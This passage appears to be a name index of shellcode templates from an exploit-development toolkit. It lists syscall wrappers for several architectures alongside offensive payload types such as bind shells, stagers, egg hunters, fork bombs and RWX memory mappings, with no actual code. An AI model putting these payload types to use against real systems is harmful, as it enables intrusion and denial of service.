aarch64.linux.timer_gettime aarch64.linux.timer_settime aarch64.linux.truncate aarch64.linux.truncate64 aarch64.linux.ulimit aarch64.linux.umask aarch64.linux.uname aarch64.linux.unlink aarch64.linux.unlinkat aarch64.linux.unshare aarch64.linux.ustat aarch64.linux.utime aarch64.linux.utimensat aarch64.linux.utimes aarch64.linux.vfork aarch64.linux.vhangup aarch64.linux.vmsplice aarch64.linux.wait4 aarch64.linux.waitid aarch64.linux.waitpid aarch64.linux.write aarch64.linux.writev aarch64.mov aarch64.pushstr aarch64.setregs aarch64.xor amd64.android.accept amd64.android.access amd64.android.acct amd64.android.alarm amd64.android.bind amd64.android.bindsh amd64.android.brk amd64.android.cat amd64.android.chdir amd64.android.chmod amd64.android.chown amd64.android.chroot amd64.android.clock_getres amd64.android.clock_gettime amd64.android.clock_nanosleep amd64.android.clock_settime amd64.android.clone amd64.android.close amd64.android.connect amd64.android.creat amd64.android.dup amd64.android.dup2 amd64.android.dup3 amd64.android.dupsh amd64.android.echo amd64.android.egghunter amd64.android.epoll_create amd64.android.epoll_create1 amd64.android.epoll_ctl amd64.android.epoll_pwait amd64.android.epoll_wait amd64.android.execve amd64.android.exit amd64.android.faccessat amd64.android.fallocate amd64.android.fchdir amd64.android.fchmod amd64.android.fchmodat amd64.android.fchown amd64.android.fchownat amd64.android.fcntl amd64.android.fdatasync amd64.android.findpeer amd64.android.findpeersh amd64.android.flock amd64.android.fork amd64.android.forkbomb amd64.android.forkexit amd64.android.fstat amd64.android.fstat64 amd64.android.fstatat64 amd64.android.fsync amd64.android.ftruncate amd64.android.ftruncate64 amd64.android.futimesat amd64.android.getcwd amd64.android.getegid amd64.android.geteuid amd64.android.getgid amd64.android.getgroups amd64.android.getitimer amd64.android.getpeername amd64.android.getpgid amd64.android.getpgrp amd64.android.getpid amd64.android.getpmsg amd64.android.getppid amd64.android.getpriority amd64.android.getresgid amd64.android.getresuid amd64.android.getrlimit amd64.android.getrusage amd64.android.getsid amd64.android.getsockname amd64.android.getsockopt amd64.android.gettimeofday amd64.android.getuid amd64.android.gtty amd64.android.ioctl amd64.android.ioperm amd64.android.iopl amd64.android.kill amd64.android.killparent amd64.android.lchown amd64.android.link amd64.android.linkat amd64.android.listen amd64.android.loader amd64.android.loader_append amd64.android.lseek amd64.android.lstat amd64.android.lstat64 amd64.android.madvise amd64.android.membot amd64.android.migrate_stack amd64.android.mincore amd64.android.mkdir amd64.android.mkdirat amd64.android.mknod amd64.android.mknodat amd64.android.mlock amd64.android.mlockall amd64.android.mmap amd64.android.mmap_rwx amd64.android.mov amd64.android.mprotect amd64.android.mq_notify amd64.android.mq_open amd64.android.mq_timedreceive amd64.android.mq_timedsend amd64.android.mq_unlink amd64.android.mremap amd64.android.msync amd64.android.munlock amd64.android.munlockall amd64.android.munmap amd64.android.nanosleep amd64.android.nice amd64.android.open amd64.android.openat amd64.android.pause amd64.android.pipe amd64.android.pipe2 amd64.android.poll amd64.android.ppoll amd64.android.prctl amd64.android.pread amd64.android.preadv amd64.android.prlimit64 amd64.android.profil amd64.android.ptrace amd64.android.push amd64.android.putpmsg amd64.android.pwrite amd64.android.pwritev amd64.android.read amd64.android.read_upto amd64.android.readahead amd64.android.readdir amd64.android.readinto amd64.android.readlink amd64.android.readlinkat amd64.android.readloop amd64.android.readn amd64.android.readptr amd64.android.readv amd64.android.recv amd64.android.recvfrom amd64.android.recvmmsg amd64.android.recvmsg amd64.android.remap_file_pages amd64.android.rename amd64.android.renameat amd64.android.rmdir amd64.android.sched_get_priority_max amd64.android.sched_get_priority_min amd64.android.sched_getaffinity amd64.android.sched_getparam amd64.android.sched_getscheduler amd64.android.sched_rr_get_interval amd64.android.sched_setaffinity amd64.android.sched_setparam amd64.android.sched_setscheduler amd64.android.sched_yield amd64.android.select amd64.android.sendfile amd64.android.sendfile64 amd64.android.setdomainname amd64.android.setgid amd64.android.setgroups amd64.android.sethostname amd64.android.setitimer amd64.android.setpgid amd64.android.setpriority amd64.android.setregid amd64.android.setresgid amd64.android.setresuid amd64.android.setreuid amd64.android.setrlimit amd64.android.setsid amd64.android.setsockopt amd64.android.setsockopt_timeout amd64.android.settimeofday amd64.android.setuid amd64.android.sh amd64.android.sigaction amd64.android.sigaltstack amd64.android.signal amd64.android.sigpending amd64.android.sigprocmask amd64.android.sigreturn amd64.android.sigsuspend amd64.android.socket amd64.android.splice amd64.android.stage amd64.android.stager amd64.android.stat amd64.android.stat64 amd64.android.stime amd64.android.strace_dos amd64.android.stty amd64.android.symlink amd64.android.symlinkat amd64.android.sync amd64.android.sync_file_range amd64.android.syscall amd64.android.syslog amd64.android.tee amd64.android.time amd64.android.timer_create amd64.android.timer_delete amd64.android.timer_getoverrun amd64.android.timer_gettime amd64.android.timer_settime amd64.android.truncate amd64.android.truncate64 amd64.android.ulimit amd64.android.umask amd64.android.uname amd64.android.unlink amd64.android.unlinkat amd64.android.unshare amd64.android.ustat amd64.android.utime amd64.android.utimensat amd64.android.utimes amd64.android.vfork amd64.android.vhangup amd64.android.vmsplice amd64.android.wait4 amd64.android.waitid amd64.android.waitpid amd64.android.write amd64.android.writeloop amd64.android.writev amd64.crash amd64.infloop amd64.itoa amd64.linux.accept amd64.linux.access amd64.linux.acct amd64.linux.alarm amd64.linux.bind amd64.linux.bindsh amd64.linux.brk amd64.linux.cat amd64.linux.chdir amd64.linux.chmod amd64.linux.chown amd64.linux.chroot amd64.linux.clock_getres amd64.linux.clock_gettime amd64.linux.clock_nanosleep amd64.linux.clock_settime amd64.linux.clone amd64.linux.close amd64.linux.connect amd64.linux.connectstager amd64.linux.creat amd64.linux.dup amd64.linux.dup2 amd64.linux.dup3 amd64.linux.dupsh amd64.linux.echo amd64.linux.egghunter amd64.linux.epoll_create amd64.linux.epoll_create1 amd64.linux.epoll_ctl amd64.linux.epoll_pwait amd64.linux.epoll_wait amd64.linux.execve amd64.linux.exit amd64.linux.faccessat amd64.linux.fallocate amd64.linux.fchdir amd64.linux.fchmod amd64.linux.fchmodat amd64.linux.fchown amd64.linux.fchownat amd64.linux.fcntl amd64.linux.fdatasync amd64.linux.findpeer amd64.linux.findpeersh amd64.linux.findpeerstager amd64.linux.flock amd64.linux.fork amd64.linux.forkbomb amd64.linux.forkexit amd64.linux.fstat amd64.linux.fstat64 amd64.linux.fstatat64 amd64.linux.fsync amd64.linux.ftruncate amd64.linux.ftruncate64 amd64.linux.futimesat amd64.linux.getcwd amd64.linux.getegid amd64.linux.geteuid amd64.linux.getgid amd64.linux.getgroups amd64.linux.getitimer amd64.linux.getpeername amd64.linux.getpgid amd64.linux.getpgrp amd64.linux.getpid amd64.linux.getpmsg amd64.linux.getppid amd64.linux.getpriority amd64.linux.getresgid amd64.linux.getresuid amd64.linux.getrlimit amd64.linux.getrusage amd64.linux.getsid amd64.linux.getsockname amd64.linux.getsockopt amd64.linux.gettimeofday amd64.linux.getuid amd64.linux.gtty amd64.linux.ioctl amd64.linux.ioperm amd64.linux.iopl amd64.linux.kill amd64.linux.killparent amd64.linux.lchown amd64.linux.link amd64.linux.linkat amd64.linux.listen amd64.linux.loader amd64.linux.loader_append amd64.linux.lseek amd64.linux.lstat amd64.linux.lstat64 amd64.linux.madvise amd64.linux.membot amd64.linux.migrate_stack amd64.linux.mincore amd64.linux.mkdir amd64.linux.mkdirat amd64.linux.mknod amd64.linux.mknodat amd64.linux.mlock amd64.linux.mlockall amd64.linux.mmap amd64.linux.mmap_rwx amd64.linux.mov amd64.linux.mprotect amd64.linux.mq_notify amd64.linux.mq_open amd64.linux.mq_timedreceive amd64.linux.mq_timedsend amd64.linux.mq_unlink amd64.linux.mremap amd64.linux.msync amd64.linux.munlock amd64.linux.munlockall amd64.linux.munmap amd64.linux.nanosleep amd64.linux.nice amd64.linux.open amd64.linux.openat amd64.linux.pause amd64.linux.pipe amd64.linux.pipe2 amd64.linux.poll amd64.linux.ppoll amd64.linux.prctl amd64.linux.pread amd64.linux.preadv amd64.linux.prlimit64 amd64.linux.profil amd64.linux.ptrace amd64.linux.push amd64.linux.putpmsg amd64.linux.pwrite amd64.linux.pwritev amd64.linux.read amd64.linux.read_upto amd64.linux.readahead amd64.linux.readdir amd64.linux.readfile amd64.linux.readinto amd64.linux.readlink amd64.linux.readlinkat amd64.linux.readloop amd64.linux.readn amd64.linux.readptr amd64.linux.readv amd64.linux.recv amd64.linux.recvfrom amd64.linux.recvmmsg amd64.linux.recvmsg amd64.linux.recvsize amd64.linux.remap_file_pages amd64.linux.rename amd64.linux.renameat amd64.linux.rmdir amd64.linux.sched_get_priority_max amd64.linux.sched_get_priority_min amd64.linux.sched_getaffinity amd64.linux.sched_getparam amd64.linux.sched_getscheduler amd64.linux.sched_rr_get_interval amd64.linux.sched_setaffinity amd64.linux.sched_setparam amd64.linux.sched_setscheduler amd64.linux.sched_yield amd64.linux.select amd64.linux.sendfile amd64.linux.sendfile64 amd64.linux.setdomainname amd64.linux.setgid amd64.linux.setgroups amd64.linux.sethostname amd64.linux.setitimer amd64.linux.setpgid amd64.linux.setpriority amd64.linux.setregid amd64.linux.setresgid amd64.linux.setresuid amd64.linux.setreuid amd64.linux.setrlimit amd64.linux.setsid amd64.linux.setsockopt amd64.linux.setsockopt_timeout amd64.linux.settimeofday amd64.linux.setuid amd64.linux.sh amd64.linux.sigaction amd64.linux.sigaltstack amd64.linux.signal amd64.linux.sigpending amd64.linux.sigprocmask amd64.linux.sigreturn amd64.linux.sigsuspend amd64.linux.socket amd64.linux.splice amd64.linux.stage amd64.linux.stager amd64.linux.stat amd64.linux.stat64 amd64.linux.stime amd64.linux.strace_dos amd64.linux.stty amd64.linux.symlink amd64.linux.symlinkat amd64.linux.sync amd64.linux.sync_file_range amd64.linux.syscall amd64.linux.syslog amd64.linux.tee amd64.linux.time amd64.linux.timer_create amd64.linux.timer_delete amd64.linux.timer_getoverrun amd64.linux.timer_gettime amd64.linux.timer_settime amd64.linux.truncate amd64.linux.truncate64 amd64.linux.ulimit amd64.linux.umask amd64.linux.uname amd64.linux.unlink amd64.linux.unlinkat amd64.linux.unshare amd64.linux.ustat amd64.linux.utime amd64.linux.utimensat amd64.linux.utimes amd64.linux.vfork amd64.linux.vhangup amd64.linux.vmsplice amd64.linux.wait4 amd64.linux.waitid amd64.linux.waitpid amd64.linux.write amd64.linux.writeloop amd64.linux.writev amd64.memcpy amd64.mov amd64.nop amd64.popad amd64.push amd64.pushad amd64.pushstr amd64.pushstr_array amd64.ret amd64.setregs amd64.strcpy amd64.strlen amd64.trap amd64.xor arm.android.accept arm.android.access arm.android.acct arm.android.alarm arm.android.bind arm.android.brk arm.android.cacheflush arm.android.cat arm.android.chdir arm.android.chmod arm.android.chown arm.android.chroot arm.android.clock_getres arm.android.clock_gettime arm.android.clock_nanosleep arm.android.clock_settime arm.android.clone arm.android.close arm.android.connect arm.android.creat arm.android.dir arm.android.dup arm.android.dup2 arm.android.dup3 arm.android.echo arm.android.egghunter arm.android.epoll_create arm.android.epoll_create1 arm.android.epoll_ctl arm.android.epoll_pwait arm.android.epoll_wait arm.android.execve arm.android.exit arm.android.faccessat arm.android.fallocate arm.android.fchdir arm.android.fchmod arm.android.fchmodat arm.android.fchown arm.android.fchownat arm.android.fcntl arm.android.fdatasync arm.android.flock arm.android.fork arm.android.forkbomb arm.android.forkexit arm.android.fstat arm.android.fstat64 arm.android.fstatat64 arm.android.fsync arm.android.ftruncate arm.android.ftruncate64 arm.android.futimesat arm.android.getcwd arm.android.getdents arm.android.getegid arm.android.geteuid arm.android.getgid arm.android.getgroups arm.android.getitimer arm.android.getpeername arm.android.getpgid arm.android.getpgrp arm.android.getpid arm.android.getpmsg arm.android.getppid arm.android.getpriority arm.android.getresgid arm.android.getresuid arm.android.getrlimit arm.android.getrusage arm.android.getsid arm.android.getsockname arm.android.getsockopt arm.android.gettimeofday arm.android.getuid arm.android.gtty arm.android.ioctl arm.android.ioperm arm.android.iopl arm.android.kill arm.android.killparent arm.android.lchown arm.android.link arm.android.linkat arm.android.listen arm.android.lseek arm.android.lstat arm.android.lstat64 arm.android.madvise arm.android.mincore arm.android.mkdir arm.android.mkdirat arm.android.mknod arm.android.mknodat arm.android.mlock arm.android.mlockall arm.android.mmap arm.android.mprotect arm.android.mq_notify arm.android.mq_open arm.android.mq_timedreceive arm.android.mq_timedsend arm.android.mq_unlink arm.android.mremap arm.android.msync arm.android.munlock arm.android.munlockall arm.android.munmap arm.android.nanosleep arm.android.nice arm.android.open arm.android.open_file arm.android.openat arm.android.pause arm.android.pipe arm.android.pipe2 arm.android.poll arm.android.ppoll arm.android.prctl arm.android.pread arm.android.preadv arm.android.prlimit64 arm.android.profil arm.android.ptrace arm.android.putpmsg arm.android.pwrite arm.android.pwritev arm.android.read arm.android.readahead arm.android.readdir arm.android.readlink arm.android.readlinkat arm.android.readv arm.android.recv arm.android.recvfrom arm.android.recvmmsg arm.android.recvmsg arm.android.remap_file_pages arm.android.rename arm.android.renameat arm.android.rmdir arm.android.sched_get_priority_max arm.android.sched_get_priority_min arm.android.sched_getaffinity arm.android.sched_getparam arm.android.sched_getscheduler arm.android.sched_rr_get_interval arm.android.sched_setaffinity arm.android.sched_setparam arm.android.sched_setscheduler arm.android.sched_yield arm.android.select arm.android.sendfile arm.android.sendfile64 arm.android.setdomainname arm.android.setgid arm.android.setgroups arm.android.sethostname arm.android.setitimer arm.android.setpgid arm.android.setpriority arm.android.setregid arm.android.setresgid arm.android.setresuid arm.android.setreuid arm.android.setrlimit arm.android.setsid arm.android.setsockopt arm.android.setsockopt_timeout arm.android.settimeofday arm.android.setuid arm.android.sh arm.android.sigaction arm.android.sigaltstack arm.android.signal arm.android.sigpending arm.android.sigprocmask arm.android.sigreturn arm.android.sigsuspend arm.android.splice arm.android.stat arm.android.stat64 arm.android.stime arm.android.stty arm.android.symlink arm.android.symlinkat arm.android.sync arm.android.sync_file_range arm.android.syscall arm.android.syslog arm.android.tee arm.android.time arm.android.timer_create arm.android.timer_delete arm.android.timer_getoverrun arm.android.timer_gettime arm.android.timer_settime arm.android.truncate arm.android.truncate64 arm.android.ulimit arm.android.umask arm.android.uname arm.android.unlink arm.android.unlinkat arm.android.unshare arm.android.ustat arm.android.utime arm.android.utimensat arm.android.utimes arm.android.vfork arm.android.vhangup arm.android.vmsplice arm.android.wait4 arm.android.waitid arm.android.waitpid arm.android.write arm.android.writev arm.crash arm.infloop arm.itoa arm.linux.accept arm.linux.access arm.linux.acct arm.linux.alarm arm.linux.bind arm.linux.brk arm.linux.cacheflush arm.linux.cat arm.linux.chdir arm.linux.chmod arm.linux.chown arm.linux.chroot arm.linux.clock_getres arm.linux.clock_gettime arm.linux.clock_nanosleep arm.linux.clock_settime arm.linux.clone arm.linux.close arm.linux.connect arm.linux.creat arm.linux.dir arm.linux.dup arm.linux.dup2 arm.linux.dup3 arm.linux.echo arm.linux.egghunter arm.linux.epoll_create arm.linux.epoll_create1 arm.linux.epoll_ctl arm.linux.epoll_pwait arm.linux.epoll_wait arm.linux.execve arm.linux.exit arm.linux.faccessat arm.linux.fallocate arm.linux.fchdir arm.linux.fchmod arm.linux.fchmodat arm.linux.fchown arm.linux.fchownat arm.linux.fcntl arm.linux.fdatasync arm.linux.flock arm.linux.fork arm.linux.forkbomb arm.linux.forkexit arm.linux.fstat arm.linux.fstat64 arm.linux.fstatat64 arm.linux.fsync arm.linux.ftruncate arm.linux.ftruncate64 arm.linux.futimesat arm.linux.getcwd arm.linux.getdents arm.linux.getegid arm.linux.geteuid arm.linux.getgid arm.linux.getgroups arm.linux.getitimer arm.linux.getpeername arm.linux.getpgid arm.linux.getpgrp arm.linux.getpid arm.linux.getpmsg arm.linux.getppid arm.linux.getpriority arm.linux.getresgid arm.linux.getresuid arm.linux.getrlimit arm.linux.getrusage arm.linux.getsid arm.linux.getsockname arm.linux.getsockopt arm.linux.gettimeofday arm.linux.getuid arm.linux.gtty arm.linux.ioctl arm.linux.ioperm arm.linux.iopl arm.linux.kill arm.linux.killparent arm.linux.lchown arm.linux.link arm.linux.linkat arm.linux.listen arm.linux.lseek arm.linux.lstat arm.linux.lstat64 arm.linux.madvise arm.linux.mincore arm.linux.mkdir arm.linux.mkdirat arm.linux.mknod arm.linux.mknodat arm.linux.mlock arm.linux.mlockall arm.linux.mmap arm.linux.mprotect arm.linux.mq_notify arm.linux.mq_open arm.linux.mq_timedreceive arm.linux.mq_timedsend arm.linux.mq_unlink arm.linux.mremap arm.linux.msync arm.linux.munlock arm.linux.munlockall arm.linux.munmap arm.linux.nanosleep arm.linux.nice arm.linux.open arm.linux.open_file arm.linux.openat arm.linux.pause arm.linux.pipe arm.linux.pipe2 arm.linux.poll arm.linux.ppoll arm.linux.prctl arm.linux.pread arm.linux.preadv arm.linux.prlimit64 arm.linux.profil arm.linux.ptrace arm.linux.putpmsg arm.linux.pwrite arm.linux.pwritev arm.linux.read arm.linux.readahead arm.linux.readdir arm.linux.readlink arm.linux.readlinkat arm.linux.readv arm.linux.recv arm.linux.recvfrom arm.linux.recvmmsg arm.linux.recvmsg arm.linux.remap_file_pages arm.linux.rename arm.linux.renameat arm.linux.rmdir arm.linux.sched_get_priority_max arm.linux.sched_get_priority_min arm.linux.sched_getaffinity arm.linux.sched_getparam arm.linux.sched_getscheduler arm.linux.sched_rr_get_interval arm.linux.sched_setaffinity arm.linux.sched_setparam arm.linux.sched_setscheduler arm.linux.sched_yield arm.linux.select arm.linux.sendfile arm.linux.sendfile64 arm.linux.setdomainname arm.linux.setgid arm.linux.setgroups arm.linux.sethostname arm.linux.setitimer arm.linux.setpgid arm.linux.setpriority arm.linux.setregid arm.linux.setresgid arm.linux.setresuid arm.linux.setreuid arm.linux.setrlimit arm.linux.setsid arm.linux.setsockopt arm.linux.setsockopt_timeout arm.linux.settimeofday arm.linux.setuid arm.linux.sh arm.linux.sigaction arm.linux.sigaltstack arm.linux.signal arm.linux.sigpending arm.linux.sigprocmask arm.linux.sigreturn arm.linux.sigsuspend arm.linux.splice arm.linux.stat arm.linux.stat64 arm.linux.stime arm.linux.stty arm.linux.symlink arm.linux.symlinkat arm.linux.sync arm.linux.sync_file_range arm.linux.syscall arm.linux.syslog arm.linux.tee arm.linux.time arm.linux.timer_create arm.linux.timer_delete arm.linux.timer_getoverrun arm.linux.timer_gettime arm.linux.timer_settime arm.linux.truncate arm.linux.truncate64 arm.linux.ulimit arm.linux.umask arm.linux.uname arm.linux.unlink arm.linux.unlinkat arm.linux.unshare arm.linux.ustat arm.linux.utime arm.linux.utimensat arm.linux.utimes arm.linux.vfork arm.linux.vhangup arm.linux.vmsplice arm.linux.wait4 arm.linux.waitid arm.linux.waitpid arm.linux.write arm.linux.writev arm.memcpy arm.mov arm.nop arm.push arm.pushstr arm.pushstr_array arm.ret arm.setregs arm.to_thumb arm.trap arm.udiv_10 arm.xor common.label i386.android.accept i386.android.acceptloop_ipv4 i386.android.access i386.android.acct i386.android.alarm i386.android.bind i386.android.brk i386.android.cat i386.android.chdir i386.android.chmod i386.android.chown i386.android.chroot i386.android.clock_getres i386.android.clock_gettime i386.android.clock_nanosleep i386.android.clock_settime i386.android.clone i386.android.close i386.android.connect i386.android.creat i386.android.dir i386.android.dup i386.android.dup2 i386.android.dup3 i386.android.dupio i386.android.dupsh i386.android.echo i386.android.egghunter i386.android.epoll_create i386.android.epoll_create1 i386.android.epoll_ctl i386.android.epoll_pwait i386.android.epoll_wait i386.android.execve i386.android.exit i386.android.faccessat i386.android.fallocate i386.android.fchdir i386.android.fchmod i386.android.fchmodat i386.android.fchown i386.android.fchownat i386.android.fcntl i386.android.fdatasync i386.android.findpeer i386.android.findpeersh i386.android.findpeerstager i386.android.flock i386.android.fork i386.android.forkbomb i386.android.forkexit i386.android.fstat i386.android.fstat64 i386.android.fstatat64 i386.android.fsync i386.android.ftruncate i386.android.ftruncate64 i386.android.futimesat i386.android.getcwd i386.android.getdents i386.android.getegid i386.android.geteuid i386.android.getgid i386.android.getgroups i386.android.getitimer i386.android.getpeername i386.android.getpgid i386.android.getpgrp i386.android.getpid i386.android.getpmsg i386.android.getppid i386.android.getpriority i386.android.getresgid i386.android.getresuid i386.android.getrlimit i386.android.getrusage i386.android.getsid i386.android.getsockname i386.android.getsockopt i386.android.gettimeofday i386.android.getuid i386.android.gtty i386.android.i386_to_amd64 i386.android.ioctl i386.android.ioperm i386.android.iopl i386.android.kill i386.android.killparent i386.android.lchown i386.android.link i386.android.linkat i386.android.listen i386.android.loader i386.android.loader_append i386.android.lseek i386.android.lstat i386.android.lstat64 i386.android.madvise i386.android.mincore i386.android.mkdir i386.android.mkdirat i386.android.mknod i386.android.mknodat i386.android.mlock i386.android.mlockall i386.android.mmap i386.android.mov i386.android.mprotect i386.android.mprotect_all i386.android.mq_notify i386.android.mq_open i386.android.mq_timedreceive i386.android.mq_timedsend i386.android.mq_unlink i386.android.mremap i386.android.msync i386.android.munlock i386.android.munlockall i386.android.munmap i386.android.nanosleep i386.android.nice i386.android.open i386.android.openat i386.android.pause i386.android.pidmax i386.android.pipe i386.android.pipe2 i386.android.poll i386.android.ppoll i386.android.prctl i386.android.pread i386.android.preadv i386.android.prlimit64 i386.android.profil i386.android.ptrace i386.android.push i386.android.putpmsg i386.android.pwrite i386.android.pwritev i386.android.read i386.android.readahead i386.android.readdir i386.android.readlink i386.android.readlinkat i386.android.readn i386.android.readv i386.android.recv i386.android.recvfrom i386.android.recvmmsg i386.android.recvmsg i386.android.remap_file_pages i386.android.rename i386.android.renameat i386.android.rmdir i386.android.sched_get_priority_max i386.android.sched_get_priority_min i386.android.sched_getaffinity i386.android.sched_getparam i386.android.sched_getscheduler i386.android.sched_rr_get_interval i386.android.sched_setaffinity i386.android.sched_setparam i386.android.sched_setscheduler i386.android.sched_yield i386.android.select i386.android.sendfile i386.android.sendfile64 i386.android.setdomainname i386.android.setgid i386.android.setgroups i386.android.sethostname i386.android.setitimer i386.android.setpgid i386.android.setpriority i386.android.setregid i386.android.setresgid i386.android.setresuid i386.android.setreuid i386.android.setrlimit i386.android.setsid i386.android.setsockopt i386.android.setsockopt_timeout i386.android.settimeofday i386.android.setuid i386.android.sh i386.android.sigaction i386.android.sigaltstack i386.android.signal i386.android.sigpending i386.android.sigprocmask i386.android.sigreturn i386.android.sigsuspend i386.android.socket i386.android.socketcall i386.android.splice i386.android.stage i386.android.stager i386.android.stat i386.android.stat64 i386.android.stime i386.android.stty i386.android.symlink i386.android.symlinkat i386.android.sync i386.android.sync_file_range i386.android.syscall i386.android.syslog i386.android.tee i386.android.time i386.android.timer_create i386.android.timer_delete i386.android.timer_getoverrun i386.android.timer_gettime i386.android.timer_settime i386.android.truncate i386.android.truncate64 i386.android.ulimit i386.android.umask i386.android.uname i386.android.unlink i386.android.unlinkat i386.android.unshare i386.android.ustat i386.android.utime i386.android.utimensat i386.android.utimes i386.android.vfork i386.android.vhangup i386.android.vmsplice i386.android.wait4 i386.android.waitid i386.android.waitpid i386.android.write i386.android.writev i386.breakpoint i386.cgc.allocate i386.cgc.cat i386.cgc.deallocate i386.cgc.fdwait i386.cgc.random i386.cgc.receive i386.cgc.sendfile i386.cgc.syscall i386.cgc.terminate i386.cgc.transmit i386.crash i386.epilog i386.freebsd.acceptloop_ipv4 i386.freebsd.i386_to_amd64 i386.freebsd.mov i386.freebsd.push i386.freebsd.sh i386.function i386.getpc i386.infloop i386.itoa i386.linux.accept i386.linux.acceptloop_ipv4 i386.linux.access i386.linux.acct i386.linux.alarm i386.linux.bind i386.linux.brk i386.linux.cat i386.linux.chdir i386.linux.chmod i386.linux.chown i386.linux.chroot i386.linux.clock_getres i386.linux.clock_gettime i386.linux.clock_nanosleep i386.linux.clock_settime i386.linux.clone i386.linux.close i386.linux.connect i386.linux.connectstager i386.linux.creat i386.linux.dir i386.linux.dup i386.linux.dup2 i386.linux.dup3 i386.linux.dupio i386.linux.dupsh i386.linux.echo i386.linux.egghunter i386.linux.epoll_create i386.linux.epoll_create1 i386.linux.epoll_ctl i386.linux.epoll_pwait i386.linux.epoll_wait i386.linux.execve i386.linux.exit i386.linux.faccessat i386.linux.fallocate i386.linux.fchdir i386.linux.fchmod i386.linux.fchmodat i386.linux.fchown i386.linux.fchownat i386.linux.fcntl i386.linux.fdatasync i386.linux.findpeer i386.linux.findpeersh i386.linux.findpeerstager i386.linux.flock i386.linux.fork i386.linux.forkbomb i386.linux.forkexit i386.linux.fstat i386.linux.fstat64 i386.linux.fstatat64 i386.linux.fsync i386.linux.ftruncate i386.linux.ftruncate64 i386.linux.futimesat i386.linux.getcwd i386.linux.getdents i386.linux.getegid i386.linux.geteuid i386.linux.getgid i386.linux.getgroups i386.linux.getitimer i386.linux.getpeername i386.linux.getpgid i386.linux.getpgrp i386.linux.getpid i386.linux.getpmsg i386.linux.getppid i386.linux.getpriority i386.linux.getresgid i386.linux.getresuid i386.linux.getrlimit i386.linux.getrusage i386.linux.getsid i386.linux.getsockname i386.linux.getsockopt i386.linux.gettimeofday i386.linux.getuid i386.linux.gtty i386.linux.i386_to_amd64 i386.linux.ioctl i386.linux.ioperm i386.linux.iopl i386.linux.kill i386.linux.killparent i386.linux.lchown i386.linux.link i386.linux.linkat i386.linux.listen i386.linux.loader i386.linux.loader_append i386.linux.lseek i386.linux.lstat i386.linux.lstat64 i386.linux.madvise i386.linux.mincore i386.linux.mkdir i386.linux.mkdirat i386.linux.mknod i386.linux.mknodat i386.linux.mlock i386.linux.mlockall i386.linux.mmap i386.linux.mov i386.linux.mprotect i386.linux.mprotect_all i386.linux.mq_notify i386.linux.mq_open i386.linux.mq_timedreceive i386.linux.mq_timedsend i386.linux.mq_unlink i386.linux.mremap i386.linux.msync i386.linux.munlock i386.linux.munlockall i386.linux.munmap i386.linux.nanosleep i386.linux.nice i386.linux.open i386.linux.openat i386.linux.pause i386.linux.pidmax i386.linux.pipe i386.linux.pipe2 i386.linux.poll i386.linux.ppoll i386.linux.prctl i386.linux.pread i386.linux.preadv i386.linux.prlimit64 i386.linux.profil i386.linux.ptrace i386.linux.push i386.linux.putpmsg i386.linux.pwrite i386.linux.pwritev i386.linux.read i386.linux.readahead i386.linux.readdir i386.linux.readfile i386.linux.readlink i386.linux.readlinkat i386.linux.readn i386.linux.readv i386.linux.recv i386.linux.recvfrom i386.linux.recvmmsg i386.linux.recvmsg i386.linux.recvsize i386.linux.remap_file_pages i386.linux.rename i386.linux.renameat i386.linux.rmdir i386.linux.sched_get_priority_max i386.linux.sched_get_priority_min i386.linux.sched_getaffinity i386.linux.sched_getparam i386.linux.sched_getscheduler i386.linux.sched_rr_get_interval i386.linux.sched_setaffinity i386.linux.sched_setparam i386.linux.sched_setscheduler i386.linux.sched_yield i386.linux.select i386.linux.sendfile i386.linux.sendfile64 i386.linux.setdomainname i386.linux.setgid i386.linux.setgroups i386.linux.sethostname i386.linux.setitimer i386.linux.setpgid i386.linux.setpriority i386.linux.setregid i386.linux.setresgid i386.linux.setresuid i386.linux.setreuid i386.linux.setrlimit i386.linux.setsid i386.linux.setsockopt i386.linux.setsockopt_timeout i386.linux.settimeofday i386.linux.setuid i386.linux.sh i386.linux.sigaction i386.linux.sigaltstack i386.linux.signal i386.linux.sigpending i386.linux.sigprocmask i386.linux.sigreturn i386.linux.sigsuspend i386.linux.socket i386.linux.socketcall i386.linux.splice i386.linux.stage i386.linux.stager i386.linux.stat i386.linux.stat64 i386.linux.stime i386.linux.stty i386.linux.symlink i386.linux.symlinkat i386.linux.sync i386.linux.sync_file_range i386.linux.syscall i386.linux.syslog i386.linux.tee i386.linux.time i386.linux.timer_create i386.linux.timer_delete i386.linux.timer_getoverrun i386.linux.timer_gettime i386.linux.timer_settime i386.linux.truncate i386.linux.truncate64 i386.linux.ulimit i386.linux.umask i386.linux.uname i386.linux.unlink i386.linux.unlinkat i386.linux.unshare i386.linux.ustat i386.linux.utime i386.linux.utimensat i386.linux.utimes i386.linux.vfork i386.linux.vhangup i386.linux.vmsplice i386.linux.wait4 i386.linux.waitid i386.linux.waitpid i386.linux.write i386.linux.writev i386.memcpy i386.mov i386.nop i386.prolog i386.push i386.pushstr i386.pushstr_array i386.ret i386.setregs i386.stackarg i386.stackhunter i386.strcpy i386.strlen i386.trap i386.xor mips.android.accept mips.android.access mips.android.acct mips.android.alarm mips.android.bind mips.android.brk mips.android.cat mips.android.chdir mips.android.chmod mips.android.chown mips.android.chroot mips.android.clock_getres mips.android.clock_gettime mips.android.clock_nanosleep mips.android.clock_settime mips.android.clone mips.android.close mips.android.connect mips.android.creat mips.android.dup mips.android.dup2 mips.android.dup3 mips.android.echo mips.android.epoll_create mips.android.epoll_create1 mips.android.epoll_ctl mips.android.epoll_pwait mips.android.epoll_wait mips.android.execve mips.android.exit mips.android.faccessat mips.android.fallocate mips.android.fchdir mips.android.fchmod mips.android.fchmodat mips.android.fchown mips.android.fchownat mips.android.fcntl mips.android.fdatasync mips.android.flock mips.android.fork mips.android.forkbomb mips.android.forkexit mips.android.fstat mips.android.fstat64 mips.android.fstatat64 mips.android.fsync mips.android.ftruncate mips.android.ftruncate64 mips.android.futimesat mips.android.getcwd mips.android.getegid mips.android.geteuid mips.android.getgid mips.android.getgroups mips.android.getitimer mips.android.getpeername mips.android.getpgid mips.android.getpgrp mips.android.getpid mips.android.getpmsg mips.android.getppid mips.android.getpriority mips.android.getresgid mips.android.getresuid mips.android.getrlimit mips.android.getrusage mips.android.getsid mips.android.getsockname mips.android.getsockopt mips.android.gettimeofday mips.android.getuid mips.android.gtty mips.android.ioctl mips.android.ioperm mips.android.iopl mips.android.kill mips.android.killparent mips.android.lchown mips.android.link mips.android.linkat mips.android.listen mips.android.lseek mips.android.lstat mips.android.lstat64 mips.android.madvise mips.android.mincore mips.android.mkdir 